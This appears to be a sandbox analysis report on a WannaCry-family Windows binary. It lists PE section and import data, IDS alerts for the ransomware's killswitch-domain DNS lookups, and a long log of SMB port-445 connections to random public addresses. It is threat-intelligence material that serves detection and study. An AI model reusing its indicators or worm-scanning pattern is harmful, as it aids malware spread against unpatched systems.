                                                                                            .reloc0x5050000x2ac0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            W0x40600x500000dataEnglishUnited States
                                                                                            DLLImport
                                                                                            KERNEL32.dllCloseHandle, WriteFile, CreateFileA, SizeofResource, LockResource, LoadResource, FindResourceA, CreateProcessA
                                                                                            MSVCRT.dllfree, _initterm, malloc, _adjust_fdiv, sprintf
                                                                                            NameOrdinalAddress
                                                                                            PlayGame10x10001114
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            192.168.2.38.8.8.859869532830018 12/22/22-10:04:13.266940UDP2830018ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup)5986953192.168.2.38.8.8.8
                                                                                            192.168.2.38.8.8.859324532830018 12/22/22-10:04:14.725246UDP2830018ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup)5932453192.168.2.38.8.8.8
                                                                                            192.168.2.38.8.8.861626532830018 12/22/22-10:04:16.970844UDP2830018ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup)6162653192.168.2.38.8.8.8
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 22, 2022 10:04:13.321547985 CET4968980192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:13.488719940 CET8049689103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.488940954 CET4968980192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:13.498811960 CET4968980192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:13.697971106 CET8049689103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.698014975 CET8049689103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.698198080 CET4968980192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:13.757677078 CET4968980192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:13.805238008 CET4969080192.168.2.376.223.26.96
                                                                                            Dec 22, 2022 10:04:13.849333048 CET804969076.223.26.96192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.849477053 CET4969080192.168.2.376.223.26.96
                                                                                            Dec 22, 2022 10:04:13.850075006 CET4969080192.168.2.376.223.26.96
                                                                                            Dec 22, 2022 10:04:13.893717051 CET804969076.223.26.96192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.924905062 CET8049689103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.987341881 CET804969076.223.26.96192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.987448931 CET4969080192.168.2.376.223.26.96
                                                                                            Dec 22, 2022 10:04:14.759691000 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:14.929833889 CET8049691103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:14.930047989 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:14.951214075 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:15.181119919 CET8049691103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.186532974 CET8049691103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.186593056 CET8049691103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.186639071 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:15.186708927 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:15.200627089 CET4969180192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:15.370647907 CET8049691103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.386737108 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.405868053 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.406099081 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.406811953 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.425873041 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.609205961 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.609311104 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.609416962 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.609709024 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.623811960 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.623961926 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.646805048 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.646805048 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.665895939 CET8049692199.59.243.222192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.667735100 CET4969280192.168.2.3199.59.243.222
                                                                                            Dec 22, 2022 10:04:15.697093964 CET49693445192.168.2.3140.162.4.232
                                                                                            Dec 22, 2022 10:04:16.818744898 CET49707445192.168.2.3132.20.133.94
                                                                                            Dec 22, 2022 10:04:17.037923098 CET4969080192.168.2.376.223.26.96
                                                                                            Dec 22, 2022 10:04:17.160403967 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.330770969 CET8049710103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.336812973 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.339276075 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.527674913 CET8049710103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.527718067 CET8049710103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.527801037 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.527801037 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.537626982 CET4971080192.168.2.3103.224.212.220
                                                                                            Dec 22, 2022 10:04:17.588776112 CET4971680192.168.2.313.248.148.254
                                                                                            Dec 22, 2022 10:04:17.608274937 CET804971613.248.148.254192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.608449936 CET4971680192.168.2.313.248.148.254
                                                                                            Dec 22, 2022 10:04:17.611576080 CET4971680192.168.2.313.248.148.254
                                                                                            Dec 22, 2022 10:04:17.631036043 CET804971613.248.148.254192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.670232058 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.670288086 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.678699017 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.686218977 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.686254978 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.690236092 CET49720445192.168.2.344.107.25.199
                                                                                            Dec 22, 2022 10:04:17.707876921 CET8049710103.224.212.220192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.742197037 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.742271900 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.742320061 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.745702028 CET804971613.248.148.254192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.745865107 CET4971680192.168.2.313.248.148.254
                                                                                            Dec 22, 2022 10:04:17.746383905 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.746416092 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.746956110 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.786786079 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.804287910 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.804323912 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.817750931 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.817856073 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.817986012 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.818908930 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.818945885 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.818974972 CET49719443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.818993092 CET4434971923.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.894279003 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.894335032 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.894496918 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.894726038 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.894747972 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.939232111 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.941318035 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.941354990 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.942177057 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.942198038 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.944339991 CET49722445192.168.2.3145.127.252.214
                                                                                            Dec 22, 2022 10:04:17.962189913 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.962272882 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.962718964 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.964015961 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.964040995 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.964072943 CET49721443192.168.2.323.211.4.90
                                                                                            Dec 22, 2022 10:04:17.964082956 CET4434972123.211.4.90192.168.2.3
                                                                                            Dec 22, 2022 10:04:18.803081036 CET49732445192.168.2.371.5.243.119
                                                                                            Dec 22, 2022 10:04:19.053570986 CET49736445192.168.2.362.39.1.80
                                                                                            Dec 22, 2022 10:04:19.572567940 CET4971680192.168.2.313.248.148.254
                                                                                            Dec 22, 2022 10:04:19.695811033 CET49746445192.168.2.3137.91.14.25
                                                                                            Dec 22, 2022 10:04:19.929081917 CET49748445192.168.2.355.147.194.174
                                                                                            Dec 22, 2022 10:04:20.195841074 CET49752445192.168.2.347.78.233.175
                                                                                            Dec 22, 2022 10:04:20.819330931 CET49761445192.168.2.3108.102.227.72
                                                                                            Dec 22, 2022 10:04:21.053941011 CET49762445192.168.2.353.83.119.12
                                                                                            Dec 22, 2022 10:04:21.303426981 CET49767445192.168.2.3100.90.128.38
                                                                                            Dec 22, 2022 10:04:21.714128017 CET49773445192.168.2.385.100.22.43
                                                                                            Dec 22, 2022 10:04:21.781893015 CET4454977385.100.22.43192.168.2.3
                                                                                            Dec 22, 2022 10:04:21.944494009 CET49776445192.168.2.392.194.37.112
                                                                                            Dec 22, 2022 10:04:22.185996056 CET49778445192.168.2.3216.55.64.225
                                                                                            Dec 22, 2022 10:04:22.287115097 CET49773445192.168.2.385.100.22.43
                                                                                            Dec 22, 2022 10:04:22.354902983 CET4454977385.100.22.43192.168.2.3
                                                                                            Dec 22, 2022 10:04:22.428895950 CET49782445192.168.2.3169.125.200.10
                                                                                            Dec 22, 2022 10:04:22.835155964 CET49789445192.168.2.390.223.94.120
                                                                                            Dec 22, 2022 10:04:23.071644068 CET49791445192.168.2.3216.98.78.27
                                                                                            Dec 22, 2022 10:04:23.319292068 CET49795445192.168.2.3204.93.28.216
                                                                                            Dec 22, 2022 10:04:23.537750959 CET49798445192.168.2.38.47.130.125
                                                                                            Dec 22, 2022 10:04:23.740853071 CET49802445192.168.2.3161.28.216.254
                                                                                            Dec 22, 2022 10:04:23.960160971 CET49806445192.168.2.370.120.129.27
                                                                                            Dec 22, 2022 10:04:24.191634893 CET49808445192.168.2.3131.178.131.95
                                                                                            Dec 22, 2022 10:04:24.703113079 CET49811445192.168.2.3182.229.80.238
                                                                                            Dec 22, 2022 10:04:24.859324932 CET49814445192.168.2.325.218.25.42
                                                                                            Dec 22, 2022 10:04:24.899997950 CET49816445192.168.2.392.36.21.234
                                                                                            Dec 22, 2022 10:04:25.089131117 CET49819445192.168.2.3187.42.237.139
                                                                                            Dec 22, 2022 10:04:25.308481932 CET49822445192.168.2.326.54.61.208
                                                                                            Dec 22, 2022 10:04:26.097842932 CET49827445192.168.2.39.183.193.154
                                                                                            Dec 22, 2022 10:04:26.184715986 CET49828445192.168.2.393.146.181.104
                                                                                            Dec 22, 2022 10:04:26.195139885 CET49830445192.168.2.3180.228.44.56
                                                                                            Dec 22, 2022 10:04:26.199971914 CET49831445192.168.2.3159.70.245.236
                                                                                            Dec 22, 2022 10:04:26.264834881 CET49832445192.168.2.3112.129.124.239
                                                                                            Dec 22, 2022 10:04:26.429487944 CET49835445192.168.2.388.243.242.35
                                                                                            Dec 22, 2022 10:04:28.495737076 CET49839445192.168.2.34.104.70.43
                                                                                            Dec 22, 2022 10:04:28.496314049 CET49840445192.168.2.370.9.68.59
                                                                                            Dec 22, 2022 10:04:28.497124910 CET49841445192.168.2.325.85.51.106
                                                                                            Dec 22, 2022 10:04:28.498145103 CET49842445192.168.2.360.153.145.107
                                                                                            Dec 22, 2022 10:04:28.499068975 CET49843445192.168.2.3187.122.186.150
                                                                                            Dec 22, 2022 10:04:28.622239113 CET49844445192.168.2.317.241.17.45
                                                                                            Dec 22, 2022 10:04:28.622426987 CET49845445192.168.2.328.23.211.163
                                                                                            Dec 22, 2022 10:04:28.786112070 CET4454984260.153.145.107192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.334609032 CET49842445192.168.2.360.153.145.107
                                                                                            Dec 22, 2022 10:04:29.622548103 CET4454984260.153.145.107192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.660202980 CET49855445192.168.2.3103.221.10.231
                                                                                            Dec 22, 2022 10:04:29.660842896 CET49856445192.168.2.353.24.76.3
                                                                                            Dec 22, 2022 10:04:29.661161900 CET49857445192.168.2.3153.168.18.112
                                                                                            Dec 22, 2022 10:04:29.661235094 CET49858445192.168.2.3144.31.215.88
                                                                                            Dec 22, 2022 10:04:29.661371946 CET49859445192.168.2.386.144.3.241
                                                                                            Dec 22, 2022 10:04:29.672458887 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:29.672521114 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.672621012 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:29.769320011 CET49862445192.168.2.360.9.103.87
                                                                                            Dec 22, 2022 10:04:29.769952059 CET49863445192.168.2.3137.167.19.86
                                                                                            Dec 22, 2022 10:04:29.770899057 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:29.770988941 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.851819038 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.852024078 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:29.853224039 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:29.853349924 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.691246986 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.691296101 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.691693068 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.691792011 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.692987919 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693013906 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693108082 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693125010 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693140984 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693150997 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693239927 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693250895 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693310976 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693324089 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693345070 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693356991 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693370104 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693377018 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693437099 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693448067 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.693465948 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.693480015 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.697539091 CET49871445192.168.2.363.54.60.231
                                                                                            Dec 22, 2022 10:04:30.787703037 CET49873445192.168.2.3104.7.35.109
                                                                                            Dec 22, 2022 10:04:30.794429064 CET49874445192.168.2.3203.214.229.169
                                                                                            Dec 22, 2022 10:04:30.795173883 CET49875445192.168.2.3139.121.143.104
                                                                                            Dec 22, 2022 10:04:30.795842886 CET49876445192.168.2.322.192.30.125
                                                                                            Dec 22, 2022 10:04:30.796927929 CET49877445192.168.2.3134.109.66.124
                                                                                            Dec 22, 2022 10:04:30.836647034 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.836736917 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.836736917 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.836802006 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.875324965 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.875375986 CET44349861204.79.197.200192.168.2.3
                                                                                            Dec 22, 2022 10:04:30.875428915 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.875463009 CET49861443192.168.2.3204.79.197.200
                                                                                            Dec 22, 2022 10:04:30.905411959 CET49879445192.168.2.3119.181.190.163
                                                                                            Dec 22, 2022 10:04:30.906639099 CET49880445192.168.2.3197.80.71.231
                                                                                            Dec 22, 2022 10:04:31.820597887 CET49894445192.168.2.360.244.166.98
                                                                                            Dec 22, 2022 10:04:31.893600941 CET49895445192.168.2.395.160.249.246
                                                                                            Dec 22, 2022 10:04:31.915792942 CET49897445192.168.2.332.101.49.150
                                                                                            Dec 22, 2022 10:04:31.916403055 CET49898445192.168.2.3174.75.228.32
                                                                                            Dec 22, 2022 10:04:31.916923046 CET49899445192.168.2.3151.172.33.78
                                                                                            Dec 22, 2022 10:04:31.917428017 CET49900445192.168.2.3118.166.85.26
                                                                                            Dec 22, 2022 10:04:32.023360014 CET49902445192.168.2.3111.231.87.176
                                                                                            Dec 22, 2022 10:04:32.023840904 CET49903445192.168.2.3125.114.45.227
                                                                                            Dec 22, 2022 10:04:32.697110891 CET49912445192.168.2.3191.103.38.253
                                                                                            Dec 22, 2022 10:04:32.945935965 CET49915445192.168.2.3156.212.27.192
                                                                                            Dec 22, 2022 10:04:32.998250961 CET49916445192.168.2.3105.172.130.207
                                                                                            Dec 22, 2022 10:04:33.023502111 CET49917445192.168.2.318.187.73.40
                                                                                            Dec 22, 2022 10:04:33.024209023 CET49918445192.168.2.350.211.71.173
                                                                                            Dec 22, 2022 10:04:33.025089979 CET49919445192.168.2.3177.254.97.109
                                                                                            Dec 22, 2022 10:04:33.025703907 CET49920445192.168.2.32.233.106.24
                                                                                            Dec 22, 2022 10:04:33.132926941 CET49922445192.168.2.3100.124.253.164
                                                                                            Dec 22, 2022 10:04:33.133532047 CET49923445192.168.2.344.180.245.5
                                                                                            Dec 22, 2022 10:04:33.820020914 CET49932445192.168.2.3196.86.39.142
                                                                                            Dec 22, 2022 10:04:34.070458889 CET49935445192.168.2.3201.122.148.66
                                                                                            Dec 22, 2022 10:04:34.118056059 CET49936445192.168.2.3150.126.60.136
                                                                                            Dec 22, 2022 10:04:34.148582935 CET49937445192.168.2.3200.65.184.253
                                                                                            Dec 22, 2022 10:04:34.149108887 CET49938445192.168.2.398.226.253.175
                                                                                            Dec 22, 2022 10:04:34.149791002 CET49939445192.168.2.3108.108.238.234
                                                                                            Dec 22, 2022 10:04:34.150484085 CET49940445192.168.2.3131.191.221.152
                                                                                            Dec 22, 2022 10:04:34.243649960 CET49943445192.168.2.3176.84.12.197
                                                                                            Dec 22, 2022 10:04:34.244185925 CET49944445192.168.2.370.254.194.176
                                                                                            Dec 22, 2022 10:04:34.720530033 CET49950445192.168.2.34.162.12.213
                                                                                            Dec 22, 2022 10:04:34.929913998 CET49953445192.168.2.3166.32.58.165
                                                                                            Dec 22, 2022 10:04:35.179960012 CET49956445192.168.2.340.245.61.80
                                                                                            Dec 22, 2022 10:04:35.242211103 CET49957445192.168.2.3216.130.20.118
                                                                                            Dec 22, 2022 10:04:35.281611919 CET49958445192.168.2.3186.169.49.16
                                                                                            Dec 22, 2022 10:04:35.281805038 CET49959445192.168.2.3204.118.198.245
                                                                                            Dec 22, 2022 10:04:35.281980038 CET49960445192.168.2.3209.183.77.242
                                                                                            Dec 22, 2022 10:04:35.281996965 CET49961445192.168.2.370.183.111.162
                                                                                            Dec 22, 2022 10:04:35.367651939 CET49964445192.168.2.3213.76.34.118
                                                                                            Dec 22, 2022 10:04:35.368916988 CET49965445192.168.2.384.114.83.58
                                                                                            Dec 22, 2022 10:04:35.841528893 CET49971445192.168.2.369.61.38.138
                                                                                            Dec 22, 2022 10:04:36.054614067 CET49974445192.168.2.394.14.4.73
                                                                                            Dec 22, 2022 10:04:36.304316044 CET49977445192.168.2.3191.42.125.95
                                                                                            Dec 22, 2022 10:04:36.367341995 CET49979445192.168.2.3153.157.149.58
                                                                                            Dec 22, 2022 10:04:36.399450064 CET49981445192.168.2.3112.240.90.37
                                                                                            Dec 22, 2022 10:04:36.422357082 CET49982445192.168.2.340.210.128.153
                                                                                            Dec 22, 2022 10:04:36.422529936 CET49983445192.168.2.3199.250.29.206
                                                                                            Dec 22, 2022 10:04:36.422615051 CET49984445192.168.2.322.216.63.84
                                                                                            Dec 22, 2022 10:04:36.492878914 CET49986445192.168.2.395.196.52.164
                                                                                            Dec 22, 2022 10:04:36.493590117 CET49987445192.168.2.34.246.48.21
                                                                                            Dec 22, 2022 10:04:36.739694118 CET49990445192.168.2.3206.2.204.199
                                                                                            Dec 22, 2022 10:04:36.961364985 CET49994445192.168.2.375.145.108.100
                                                                                            Dec 22, 2022 10:04:37.168545961 CET49997445192.168.2.3107.44.222.3
                                                                                            Dec 22, 2022 10:04:37.415146112 CET50000445192.168.2.3191.152.58.40
                                                                                            Dec 22, 2022 10:04:37.478288889 CET50002445192.168.2.374.195.154.247
                                                                                            Dec 22, 2022 10:04:37.509629011 CET50003445192.168.2.360.210.135.28
                                                                                            Dec 22, 2022 10:04:37.525912046 CET50005445192.168.2.3205.76.23.208
                                                                                            Dec 22, 2022 10:04:37.528621912 CET50006445192.168.2.382.244.187.136
                                                                                            Dec 22, 2022 10:04:37.531177998 CET50007445192.168.2.329.211.45.13
                                                                                            Dec 22, 2022 10:04:37.602709055 CET50009445192.168.2.3124.133.123.22
                                                                                            Dec 22, 2022 10:04:37.603075981 CET50010445192.168.2.3151.125.133.85
                                                                                            Dec 22, 2022 10:04:37.836587906 CET50013445192.168.2.3219.253.250.54
                                                                                            Dec 22, 2022 10:04:38.072860003 CET50017445192.168.2.3130.122.170.123
                                                                                            Dec 22, 2022 10:04:38.322160959 CET50020445192.168.2.368.215.49.177
                                                                                            Dec 22, 2022 10:04:38.602159977 CET50025445192.168.2.3188.200.135.177
                                                                                            Dec 22, 2022 10:04:38.633138895 CET50027445192.168.2.3220.49.251.223
                                                                                            Dec 22, 2022 10:04:38.655533075 CET50028445192.168.2.3171.221.42.122
                                                                                            Dec 22, 2022 10:04:38.655675888 CET50029445192.168.2.380.43.151.11
                                                                                            Dec 22, 2022 10:04:38.655867100 CET50030445192.168.2.3195.94.128.129
                                                                                            Dec 22, 2022 10:04:38.727056026 CET50032445192.168.2.378.13.110.122
                                                                                            Dec 22, 2022 10:04:38.727699041 CET50033445192.168.2.357.47.178.20
                                                                                            Dec 22, 2022 10:04:38.746912003 CET50034445192.168.2.3187.81.34.86
                                                                                            Dec 22, 2022 10:04:38.974081039 CET50037445192.168.2.396.127.187.4
                                                                                            Dec 22, 2022 10:04:39.200901985 CET50040445192.168.2.392.160.120.98
                                                                                            Dec 22, 2022 10:04:39.445363045 CET50043445192.168.2.37.135.251.71
                                                                                            Dec 22, 2022 10:04:39.664186954 CET50047445192.168.2.330.243.48.136
                                                                                            Dec 22, 2022 10:04:39.711412907 CET50049445192.168.2.347.126.180.174
                                                                                            Dec 22, 2022 10:04:39.754735947 CET50051445192.168.2.331.156.180.199
                                                                                            Dec 22, 2022 10:04:39.778469086 CET50052445192.168.2.382.120.70.183
                                                                                            Dec 22, 2022 10:04:39.778800011 CET50053445192.168.2.3130.4.157.230
                                                                                            Dec 22, 2022 10:04:39.778893948 CET50054445192.168.2.39.62.240.92
                                                                                            Dec 22, 2022 10:04:39.857367039 CET50055445192.168.2.3223.32.125.71
                                                                                            Dec 22, 2022 10:04:39.858043909 CET50056445192.168.2.379.110.75.29
                                                                                            Dec 22, 2022 10:04:39.878005981 CET50057445192.168.2.310.61.98.72
                                                                                            Dec 22, 2022 10:04:40.091479063 CET50060445192.168.2.339.215.89.228
                                                                                            Dec 22, 2022 10:04:40.324306011 CET50064445192.168.2.3107.19.30.223
                                                                                            Dec 22, 2022 10:04:40.554758072 CET50067445192.168.2.3188.125.53.31
                                                                                            Dec 22, 2022 10:04:40.760143042 CET50071445192.168.2.325.67.236.122
                                                                                            Dec 22, 2022 10:04:40.790080070 CET50072445192.168.2.3117.170.82.35
                                                                                            Dec 22, 2022 10:04:40.837506056 CET50074445192.168.2.3173.242.43.35
                                                                                            Dec 22, 2022 10:04:40.853504896 CET50075445192.168.2.337.175.42.197
                                                                                            Dec 22, 2022 10:04:40.899425983 CET50076445192.168.2.3180.159.246.69
                                                                                            Dec 22, 2022 10:04:40.900355101 CET50077445192.168.2.398.56.154.94
                                                                                            Dec 22, 2022 10:04:40.901334047 CET50078445192.168.2.3208.195.4.137
                                                                                            Dec 22, 2022 10:04:40.967061996 CET50079445192.168.2.395.99.34.210
                                                                                            Dec 22, 2022 10:04:40.967061996 CET50080445192.168.2.3215.253.198.191
                                                                                            Dec 22, 2022 10:04:40.992736101 CET50082445192.168.2.350.7.246.128
                                                                                            Dec 22, 2022 10:04:41.219125986 CET50084445192.168.2.3102.186.67.51
                                                                                            Dec 22, 2022 10:04:41.668200016 CET50092445192.168.2.3102.60.43.126
                                                                                            Dec 22, 2022 10:04:41.867995024 CET50096445192.168.2.3134.101.38.136
                                                                                            Dec 22, 2022 10:04:41.899384022 CET50097445192.168.2.366.207.74.129
                                                                                            Dec 22, 2022 10:04:41.962723017 CET50098445192.168.2.3206.25.186.104
                                                                                            Dec 22, 2022 10:04:41.962826967 CET50099445192.168.2.314.22.207.126
                                                                                            Dec 22, 2022 10:04:42.010651112 CET50101445192.168.2.3155.76.207.209
                                                                                            Dec 22, 2022 10:04:42.012325048 CET50102445192.168.2.3123.100.93.141
                                                                                            Dec 22, 2022 10:04:42.013829947 CET50103445192.168.2.3109.159.246.63
                                                                                            Dec 22, 2022 10:04:42.087912083 CET50104445192.168.2.380.0.73.233
                                                                                            Dec 22, 2022 10:04:42.089026928 CET50105445192.168.2.3140.211.107.76
                                                                                            Dec 22, 2022 10:04:42.117736101 CET50106445192.168.2.395.226.206.133
                                                                                            Dec 22, 2022 10:04:42.321052074 CET50110445192.168.2.3170.73.200.141
                                                                                            Dec 22, 2022 10:04:42.539845943 CET50113445192.168.2.32.47.230.24
                                                                                            Dec 22, 2022 10:04:42.778107882 CET50116445192.168.2.3137.147.115.181
                                                                                            Dec 22, 2022 10:04:42.789958000 CET50117445192.168.2.366.40.79.52
                                                                                            Dec 22, 2022 10:04:42.993834019 CET50121445192.168.2.3206.249.147.75
                                                                                            Dec 22, 2022 10:04:43.023869038 CET50123445192.168.2.3200.67.16.245
